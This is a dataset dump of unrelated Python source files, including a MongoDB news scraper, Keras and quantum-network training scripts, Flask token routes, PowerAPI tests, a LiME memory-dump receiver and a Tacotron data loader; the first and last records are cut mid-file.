poll.\\n\")\n","sub_path":"Crash_Course/6.4-6.6/6-6_polling.py","file_name":"6-6_polling.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"31741261","text":"import unittest\nimport neuralpy\n\n\nclass associatingElementsTest(unittest.TestCase):\n\n\tdef test_cost_function(self):\n\t\t#tuples are arranged as ((input1, input2), expected_output)\n\t\tcases = [((1.0, 1.0), 0.0),\n\t\t\t\t((1.0, 0.5), 0.125),\n\t\t\t\t((0.5, 1.0), 0.125),\n\t\t\t\t((0.25, 0.0), 0.03125),\n\t\t\t\t((0.0, 0.25), 0.03125)\n\t\t\t]\t\n\t\tfor case in cases:\n\t\t\tinput1 = case[0][0]\n\t\t\tinput2 = case[0][1]\n\t\t\toutput = case[1]\n\t\t\tself.assertEqual(neuralpy.cost_function(input1, input2), output)\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"neuralpy/tests/test_neural.py","file_name":"test_neural.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63172401","text":"\"\"\"Script to scrape the data and place it to database\"\"\"\nimport subprocess\nimport sys\nfrom pymongo import MongoClient\nfrom pymongo.errors import BulkWriteError\nfrom news.scraping.sites.rss import GoogleRss\n\n\nMONGO_CLIENT = 'mongodb://localhost:27017/'\nNEWS_DB_NAME = 'news-db'\nCOLLECTION_NAME = 'google-rss'\nDEFAULT_DUMP_FILE = 'news.csv'\n\ndef get_documents(feed):\n \"\"\"Transform newsfeed to list of documents to paste\n\n Params\n ------\n feed\n scrapable news source\n \"\"\"\n\n news = feed.scrape()\n return [onenew.document() for onenew in news]\n\ndef load_documents(collection, news):\n \"\"\"Save news to mongo db collection\n\n Params\n ------\n collection\n mongo db collection\n news\n list of news documents to save\n \"\"\"\n\n try:\n collection.insert_many(news, ordered=False)\n except BulkWriteError:\n pass\n\ndef start_mongo():\n \"\"\"Starts mongo db\"\"\"\n\n try:\n subprocess.run(['mongod'], check=True)\n except subprocess.CalledProcessError:\n print('Failed, but most likely mongo is already started')\n\ndef dump_csv():\n \"\"\"Dumps mongo collection to csv\"\"\"\n\n csv_file = input(f'Which file? ({DEFAULT_DUMP_FILE})\\n') \\\n or DEFAULT_DUMP_FILE\n\n cmd = [\n 'mongoexport',\n f'--collection={COLLECTION_NAME}',\n f'--db={NEWS_DB_NAME}',\n f'--out={csv_file}',\n f'--uri={MONGO_CLIENT}',\n '--type=csv',\n '--fields=pubtime,title,link,description,body'\n ]\n\n subprocess.run(cmd, check=True)\n\ndef ask(collection, feed):\n \"\"\"User interface\n\n Params\n ------\n collection\n mongo db collection\n feed\n scrapable news source\n \"\"\"\n\n question = 'What do you want?\\n' \\\n '[0] - run mongo\\n' \\\n '[1] - scrape site\\n' \\\n '[2] - dump data\\n' \\\n '[q] - exit\\n'\n\n answer = input(question)\n if answer == '0':\n start_mongo()\n elif answer == '1':\n news = get_documents(feed)\n load_documents(collection, news)\n elif answer == '2':\n dump_csv()\n elif answer == 'q':\n sys.exit()\n\n\nif __name__ == \"__main__\":\n client = MongoClient(MONGO_CLIENT)\n newsdb = client[NEWS_DB_NAME]\n googlecoll = newsdb[COLLECTION_NAME]\n newsfeed = GoogleRss()\n\n while True:\n ask(googlecoll, newsfeed)\n","sub_path":"entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"149361304","text":"#!/usr/bin/env python\n\ndef init_solvent_db():\n\n import os\n import glob\n from . import Solvents\n path = os.path.join(os.path.dirname(Solvents.__file__), 'data','solventlib')\n print(\"Building solvent database...\")\n dbpath = os.path.join(path, 'SOLVENTS.db')\n configfilelist = glob.glob(os.path.join(path, '*.config'))\n maker=Solvents.SolventManager()\n for conffile in configfilelist:\n print('Adding solvent from {}'.format(conffile))\n maker.saveSolvent(maker.createSolvent(conffile), db=dbpath, createEmpty=True)\n if os.path.exists(dbpath): print(\"DONE creating solvent DB\")\n\n","sub_path":"pyMDMix/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"417571830","text":"from dask.distributed import Client\nimport time\nfrom pennylane import numpy as np\nimport pennylane as qml\nimport qnetvo as qnet\n\n# local imports\nfrom context import src\n\n\"\"\"\nThis script considers the bilocal scenario with white noise detectors errors applied\nto each detector.\n\nWe consider errors where the constant value 0/1 are output with equal probability when\nthe detector errors occur.\nWe scan through the values [0,1] for errors on each detector.\nFor each pair of error rates (p1,p2), we optimize pure state preparations\nand projective measurements for maximal violation of the CHSH scenario.\n\nWe consider Bell state preparations and arbitrary state preparations.\n\"\"\"\n\nif __name__ == \"__main__\":\n\n max_ent_prep_nodes = [\n qnet.PrepareNode(1, [0, 1], qnet.max_entangled_state, 3),\n qnet.PrepareNode(1, [2, 3], qnet.max_entangled_state, 3),\n ]\n ghz_prep_nodes = [\n qnet.PrepareNode(1, [0, 1], qnet.ghz_state, 0),\n qnet.PrepareNode(1, [2, 3], qnet.ghz_state, 0),\n ]\n arb_prep_nodes = [\n qnet.PrepareNode(1, [0, 1], qml.ArbitraryStatePreparation, 6),\n qnet.PrepareNode(1, [2, 3], qml.ArbitraryStatePreparation, 6),\n ]\n\n local_rot_meas_nodes = [\n qnet.MeasureNode(2, 2, [0], src.local_rot, 3),\n qnet.MeasureNode(2, 2, [1, 2], src.local_rot, 6),\n qnet.MeasureNode(2, 2, [3], src.local_rot, 3),\n ]\n local_ry_meas_nodes = [\n qnet.MeasureNode(2, 2, [0], qnet.local_RY, 1),\n qnet.MeasureNode(2, 2, [1, 2], qnet.local_RY, 2),\n qnet.MeasureNode(2, 2, [3], qnet.local_RY, 1),\n ]\n arb_meas_nodes = [\n qnet.MeasureNode(2, 2, [0], src.local_rot, 3),\n qnet.MeasureNode(2, 2, [1, 2], qml.ArbitraryUnitary, 15),\n qnet.MeasureNode(2, 2, [3], src.local_rot, 3),\n ]\n\n white_noise_error_map = np.array([[0.5, 0.5], [0.5, 0.5]])\n\n scan_range = np.arange(0, 1.001, 0.05)\n\n # preparing noise parameters for use with dask.distributed\n params_range = np.zeros((3, len(scan_range)))\n for i, gamma in enumerate(scan_range):\n params_range[:, i] = [gamma] * 3\n\n data_filepath = \"data/bilocal/uniform_detector_white_noise/\"\n client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # \"\"\"\n # # max entangled preparations local rot\n # \"\"\"\n # time_start = time.time()\n # max_ent_local_rot_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(max_ent_prep_nodes, local_rot_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.4,\n # \"num_steps\": 40,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # max_ent_local_rot_opt_jobs = client.map(max_ent_local_rot_state_optimization, *params_range)\n # max_ent_local_rot_opt_dicts = client.gather(max_ent_local_rot_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"max_ent_local_rot_\",\n # scan_range,\n # max_ent_local_rot_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n # \"\"\"\n # # minimal optimal ansatz\n # \"\"\"\n # client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # time_start = time.time()\n # ghz_local_ry_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(ghz_prep_nodes, local_ry_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.4,\n # \"num_steps\": 40,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # ghz_local_ry_opt_jobs = client.map(ghz_local_ry_state_optimization, *params_range)\n # ghz_local_ry_opt_dicts = client.gather(ghz_local_ry_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"ghz_local_ry_\",\n # scan_range,\n # ghz_local_ry_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n # \"\"\"\n # # max entangled prep arb meas\n # \"\"\"\n # client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # time_start = time.time()\n # max_ent_arb_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(max_ent_prep_nodes, arb_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.2,\n # \"num_steps\": 50,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # max_ent_arb_opt_jobs = client.map(max_ent_arb_state_optimization, *params_range)\n # max_ent_arb_opt_dicts = client.gather(max_ent_arb_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"max_ent_arb_\",\n # scan_range,\n # max_ent_arb_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n # \"\"\"\n # arb prep local rot meas\n # \"\"\"\n # client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # time_start = time.time()\n # arb_local_rot_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(arb_prep_nodes, local_rot_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.2,\n # \"num_steps\": 60,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # arb_local_rot_opt_jobs = client.map(arb_local_rot_state_optimization, *params_range)\n # arb_local_rot_opt_dicts = client.gather(arb_local_rot_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"arb_local_rot_\",\n # scan_range,\n # arb_local_rot_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n \"\"\"\n arb prep arb meas\n \"\"\"\n client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n time_start = time.time()\n arb_arb_state_optimization = src.detector_error_opt_fn(\n qnet.NetworkAnsatz(arb_prep_nodes, arb_meas_nodes),\n src.detector_error_chain_cost_fn,\n cost_kwargs={\"error_map\": white_noise_error_map,},\n opt_kwargs={\"step_size\": 1, \"num_steps\": 80, \"sample_width\": 5, \"verbose\": False,},\n )\n\n arb_arb_opt_jobs = client.map(arb_arb_state_optimization, *params_range)\n arb_arb_opt_dicts = client.gather(arb_arb_opt_jobs)\n\n print(\"optimization time : \", time.time() - time_start)\n\n src.save_optimizations_one_param_scan(\n data_filepath,\n \"arb_arb_\",\n scan_range,\n arb_arb_opt_dicts,\n quantum_bound=np.sqrt(2),\n classical_bound=1,\n )\n","sub_path":"script/bilocal/uniform_detector_white_noise.py","file_name":"uniform_detector_white_noise.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"17018219","text":"#!/usr/bin/python\nimport os, sys\n\nnode_ext = \"node.html\"\nfunc_ext = \"func.html\"\n\nif __name__ == '__main__':\n dump_dir = \".\"\n len_node_ext = len(node_ext)\n len_func_ext = len(func_ext)\n node_list = []\n func_list = []\n etc_list = []\n png_file = None\n for e in os.listdir(dump_dir):\n if (len(e) > len_node_ext) and (e[-len_node_ext:]==node_ext):\n node_list.append(e)\n elif (len(e) > len_func_ext) and (e[-len_func_ext:]==func_ext):\n func_list.append(e)\n elif (len(e) > 5) and (e[-5:] == '.html'):\n etc_list.append(e)\n elif (png_file == None) and (len(e) > 4) and (e[-4:] == '.png'):\n png_file = e\n print(node_list)\n print(\"===\")\n print(func_list)\n print(\"===\")\n print(etc_list)\n # create index.html\n findex = open(\"index.html\", 'w')\n findex.write('\\n')\n findex.write('INDEX\\n')\n findex.write('\\n')\n if (png_file != None):\n findex.write('Control flow graph\\n'%png_file) \n findex.write('
\\n')\n findex.write('Functions
\\n')\n for fn in func_list:\n findex.write('%s
\\n'%(fn, fn))\n findex.write('
\\n')\n findex.write('CFG Nodes
\\n')\n for n in node_list:\n findex.write('%s
\\n'%(n,n))\n findex.write('
\\n')\n findex.write('Exit/Start/Call nodes
\\n')\n for n in etc_list:\n findex.write('%s
\\n'%(n,n))\n findex.write('\\n')\n findex.write('')\n findex.close()\n \n \n","sub_path":"mkhtmlindex.py","file_name":"mkhtmlindex.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"10189445","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# (c) Copyright 2019 Enric Moreu. All Rights Reserved.\n\nimport time\nstart = time.time()\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom keras import callbacks\nfrom keras import optimizers\nfrom utils.telegram import send\n\nexperiment = '2.9.0.final'\n\ntrain_path = '/data/resized_224/train'\nvalidation_path = '/data/resized_224/validation'\ntest_path = '/data/resized_224/test'\nepochs = 50\nsteps_per_epoch = 300\nvalidation_steps=50\nbatch_size = 32\nlr=5e-6\ndecay=0\n\n## Load data + augmentation\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n zoom_range=0.2,\n rotation_range=20)\n\n\ntrain_generator = train_datagen.flow_from_directory(\n train_path,\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary') \n\nvalidation_datagen = ImageDataGenerator(\n rescale=1./255)\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_path,\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary')\n\ntest_datagen = ImageDataGenerator(\n rescale=1./255)\n\ntest_generator = test_datagen.flow_from_directory(\n test_path,\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary')\n\n## Define model\n\nmodel = Sequential()\nmodel.add(Conv2D(64, (3, 3), input_shape=(224,224,3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(256, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(256, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(256, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(4096))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(4096))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\n## Define optimizer\nopt = optimizers.Adam(lr=lr,decay=decay)\n\nmodel.compile(loss = 'binary_crossentropy',\n optimizer = opt,\n metrics = ['accuracy'])\n\n## Callbacks\n\n# Tensorboard\ntbCallBack = callbacks.TensorBoard(log_dir='/code/logs/{}'.format(experiment))\n\n# Checkpoints\ncheckpoints = callbacks.ModelCheckpoint('/code/checkpoints/{}.weights'.format(experiment), monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=False, mode='auto', period=1)\n\n## Train model\nmodel.fit_generator(\n train_generator,\n epochs=epochs,\n steps_per_epoch=steps_per_epoch,\n validation_steps=validation_steps,\n validation_data=validation_generator,\n callbacks=[\n tbCallBack,\n checkpoints\n ],\n shuffle=True,\n verbose=1,\n workers=4,\n use_multiprocessing=True)\n\n## Evaluate model\n\n# Load best model\nbest_model = load_model('/code/checkpoints/{}.weights'.format(experiment))\n\n\n# Forward test images\nresults = best_model.evaluate_generator(test_generator,\n workers=4,\n use_multiprocessing=True)\n\nend = time.time()\ntotal_time = (end - start)\n\nsend('''Experiment {} finished in {} seconds\nLR: {}\nTest accuracy: {}\n'''.format(experiment, int(total_time), lr, '%.2f'%(results[1]*100)))","sub_path":"src/model/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"561997381","text":"class Solution(object):\n def maxDepth(self, root):\n if root == None:\n return 0\n depth = 0\n stack = [root]\n while stack:\n next_level = []\n while stack:\n node = stack.pop()\n if node.children:\n next_level += node.children #此处不能使用 append method\n stack = next_level\n depth += 1\n return depth","sub_path":"559.py","file_name":"559.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396909397","text":"import traceback\n\nfrom flask import Blueprint\nfrom flask_restful import request, current_app\nfrom ml_enabler.utils import err\nfrom ml_enabler.models.utils import NotFound\nfrom flask_login import login_required\nfrom ml_enabler.services.token_service import TokenService\nfrom flask import jsonify\nfrom flask_login import current_user\n\ntoken_bp = Blueprint(\"token_bp\", __name__)\n\n\n@login_required\n@token_bp.route(\"/v1/user/token\", methods=[\"GET\"])\ndef list():\n \"\"\"\n List tokens for the given user session\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token List\n \"\"\"\n try:\n tokens = TokenService.list(current_user.id)\n return jsonify(tokens), 200\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n\n\n@login_required\n@token_bp.route(\"/v1/user/token\", methods=[\"POST\"])\ndef post():\n \"\"\"\n Create a new Token\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token\n \"\"\"\n try:\n token_payload = request.get_json()\n token_payload[\"uid\"] = current_user.id\n return TokenService.create(token_payload), 200\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n\n\n@login_required\n@token_bp.route(\"/v1/user/token/\", methods=[\"GET\"])\ndef get(token_id):\n \"\"\"\n Get a specific Token\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token\n \"\"\"\n try:\n return TokenService.get(current_user.id, token_id)\n except NotFound:\n return err(404, \"No Token Found\"), 404\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n\n\n@login_required\n@token_bp.route(\"/v1/user/token/\", methods=[\"DELETE\"])\ndef delete(token_id):\n \"\"\"\n Delete a specific Token\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token\n \"\"\"\n try:\n return TokenService.delete(current_user.id, token_id)\n except NotFound:\n return err(404, \"No Token Found\"), 404\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n","sub_path":"ml_enabler/api/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"52052631","text":"# Copyright (c) 2018, INRIA\n# Copyright (c) 2018, University of Lille\n# All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\nimport logging\n\nfrom multiprocessing import Queue\n\nimport pytest\n\nfrom mock import Mock\nfrom powerapi.report import Report\nfrom powerapi.puller import PullerActor\nfrom powerapi.message import StartMessage, ErrorMessage\nfrom powerapi.filter import Filter\n\nfrom ..actor.abstract_test_actor import AbstractTestActor\nfrom ..db_utils import FakeDB, AbstractTestActorWithDB, define_database_content, REPORT1, REPORT2\n\n\ndef define_filter(filt):\n \"\"\"\n Decorator to set the _filt\n attribute for individual tests.\n \"\"\"\n def wrap(func):\n setattr(func, '_filter', filt)\n return func\n return wrap\n\n\ndef pytest_generate_tests(metafunc):\n \"\"\"\n Function called by pytest when collecting a test_XXX function\n\n define the content fixtures in test environement with collected the\n value _content if it exist or with an empty content\n\n :param metafunc: the test context given by pytest\n \"\"\"\n if 'content' in metafunc.fixturenames:\n content = getattr(metafunc.function, '_content', None)\n if isinstance(content, list):\n metafunc.parametrize('content', [content])\n else:\n metafunc.parametrize('content', [[]])\n\n\n if 'filt' in metafunc.fixturenames:\n filt = getattr(metafunc.function, '_filter', None)\n metafunc.parametrize('filt', [filt])\n\n\nclass FakeDispatcher:\n\n def __init__(self):\n self.q = Queue()\n\n def send_data(self, report):\n self.q.put(report, block=False)\n\n\nclass TestPuller(AbstractTestActorWithDB):\n\n @pytest.fixture\n def fake_dispatcher(self):\n return FakeDispatcher()\n\n @pytest.fixture\n def fake_filter(self, fake_dispatcher):\n fake_filter = Mock()\n fake_filter.filters = [(Mock(return_value=True), Mock())]\n fake_filter.route = Mock(return_value=[fake_dispatcher])\n fake_filter.get_type = Mock(return_value=Report)\n return fake_filter\n\n @pytest.fixture\n def actor(self, fake_db, filt, fake_filter):\n filter = fake_filter if filt is None else filt\n return PullerActor('puller_test', fake_db, filter, 0, level_logger=logging.DEBUG)\n\n @define_database_content([REPORT1, REPORT2])\n def test_start_actor_with_db_thath_contains_2_report_make_actor_send_reports_to_dispatcher(self, started_actor, fake_dispatcher, content):\n for report in content:\n assert fake_dispatcher.q.get(timeout=2) == report\n\n def test_starting_actor_in_stream_mode_make_it_terminate_itself_after_empty_db(self, started_actor):\n started_actor.join(2)\n assert started_actor.is_alive() is False\n\n @define_filter(Filter())\n def test_send_start_message_to_puller_without_filter_answer_with_error_message(self, init_actor):\n init_actor.send_control(StartMessage())\n msg = init_actor.receive_control(2000)\n assert isinstance(msg, ErrorMessage)\n","sub_path":"tests/unit/puller/test_puller_actor.py","file_name":"test_puller_actor.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"586294449","text":"import socket\nimport os\nfrom datetime import datetime\n\nfrom conf import LIME_PORT\nfrom elastic_util import ElasticUtil\n\n# Receive dump from client\ndef recv_dump(ip):\n\n try:\n output_dir = os.path.join(os.getcwd(), 'Dumps')\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n output_path = os.path.join(output_dir, datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\") + \" - \" + ip + \".lime\")\n with open(output_path, 'wb') as out:\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, LIME_PORT))\n except Exception as e:\n es = ElasticUtil()\n es.log_error(\"DumpReceive ConnectError: \" + e.message)\n while True:\n mem_data = s.recv(1024)\n if not mem_data:\n break\n out.write(mem_data)\n\n es = ElasticUtil()\n es.log(\"Successfully dumped memory to \" + output_path)\n\n except Exception as e:\n es = ElasticUtil()\n es.log_error(\"DumpReceive CreateError: \" + e.message)\n\n\n\n\n","sub_path":"GYMIC-Server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"154086442","text":"import numpy as np\nimport torch\nimport torch.utils.data\nimport os\n\nimport layers\nfrom utils import load_wav_to_torch, load_filepaths_and_text\n# for individual & batch level permuting\nfrom utils import permute_filelist, permute_batch_from_filelist\n# for pre-batching\nfrom utils import batching, get_batch_sizes, permute_batch_from_batch\nfrom text import text_to_sequence\n\n\nclass TextMelLoader(torch.utils.data.Dataset):\n \"\"\"\n 1) loads audio,text pairs\n 2) normalizes text and converts them to sequences of one-hot vectors\n 3) computes mel-spectrograms from audio files.\n \"\"\"\n def __init__(self, audiopaths_and_text, shuffle_plan, hparams, epoch=0,\n speaker_ids=None, emotion_ids=None):\n self.audiopaths_and_text = load_filepaths_and_text(audiopaths_and_text)\n self.shuffle_audiopaths = shuffle_plan['shuffle-audiopath']\n self.shuffle_batches = shuffle_plan['shuffle-batch']\n self.permute_opt = shuffle_plan['permute-opt']\n self.pre_batching = shuffle_plan['pre-batching']\n self.prep_trainset_per_epoch = hparams.prep_trainset_per_epoch\n self.filelist_cols = hparams.filelist_cols\n self.local_rand_factor = hparams.local_rand_factor\n self.include_emo_emb = hparams.include_emo_emb\n self.emo_emb_dim = hparams.emo_emb_dim\n self.text_cleaners = hparams.text_cleaners\n self.max_wav_value = hparams.max_wav_value\n self.sampling_rate = hparams.sampling_rate\n self.load_mel_from_disk = hparams.load_mel_from_disk\n self.n_speakers = hparams.n_speakers\n self.n_emotions = hparams.n_emotions\n self.label_type = hparams.label_type\n self.use_vae = hparams.use_vae\n\n if hparams.override_sample_size:\n self.hop_length = int(np.ceil(hparams.hop_time/1000*hparams.sampling_rate))\n self.win_length = int(np.ceil(hparams.win_time/1000*hparams.sampling_rate))\n self.filter_length = int(2**np.ceil(np.log2(self.win_length)))\n else:\n self.hop_length = hparams.hop_length\n self.win_length = hparams.win_length\n self.filter_length = hparams.filter_length\n self.stft = layers.TacotronSTFT(\n self.filter_length, self.hop_length, self.win_length,\n hparams.n_mel_channels, hparams.sampling_rate, hparams.mel_fmin,\n hparams.mel_fmax)\n\n audiopaths_and_text_ori = self.audiopaths_and_text[:]\n if self.prep_trainset_per_epoch:\n seed = hparams.seed + epoch\n else:\n seed = hparams.seed\n if self.shuffle_audiopaths:\n self.audiopaths_and_text = permute_filelist(self.audiopaths_and_text,\n self.filelist_cols, seed, self.permute_opt, self.local_rand_factor)[0]\n if self.pre_batching:\n batch_sizes = get_batch_sizes(self.audiopaths_and_text,\n hparams.filelist_cols, hparams.batch_size)\n assert sum(batch_sizes) == len(self.audiopaths_and_text),\\\n \"check: not all samples get batched in pre-batching!\"\n self.audiopaths_and_text = batching(self.audiopaths_and_text, batch_sizes)\n if self.shuffle_batches:\n if self.pre_batching:\n self.audiopaths_and_text = permute_batch_from_batch(\n self.audiopaths_and_text, seed)\n else:\n self.audiopaths_and_text = permute_batch_from_filelist(\n self.audiopaths_and_text, hparams.batch_size, seed)\n\n self.speaker_ids = speaker_ids\n if not self.speaker_ids:\n self.speaker_ids = self.create_lookup(audiopaths_and_text_ori, 'speaker')\n\n self.emotion_ids = emotion_ids\n if not self.emotion_ids:\n self.emotion_ids = self.create_lookup(audiopaths_and_text_ori, 'emotion')\n\n def parse_filelist_line(self, audiopath_and_text):\n # parse basic cols\n audiopath = audiopath_and_text[self.filelist_cols.index('audiopath')]\n text = audiopath_and_text[self.filelist_cols.index('text')]\n # parse optional cols\n emoembpath, dur, speaker, emotion = '', '', '', ''\n if 'emoembpath' in self.filelist_cols:\n emoembpath = audiopath_and_text[self.filelist_cols.index('emoembpath')]\n if 'dur' in self.filelist_cols:\n dur = float(audiopath_and_text[self.filelist_cols.index('dur')])\n if 'speaker' in self.filelist_cols:\n speaker = audiopath_and_text[self.filelist_cols.index('speaker')]\n if 'emotion' in self.filelist_cols:\n emotion = audiopath_and_text[self.filelist_cols.index('emotion')]\n return audiopath, emoembpath, text, dur, speaker, emotion\n\n def get_mel_text_pair(self, audiopath_and_text):\n # separate filename and text\n emoemb, speaker, emotion = '', '', ''\n audiopath, emoembpath, text, dur, speaker, emotion = \\\n self.parse_filelist_line(audiopath_and_text)\n text = self.get_text(text) # 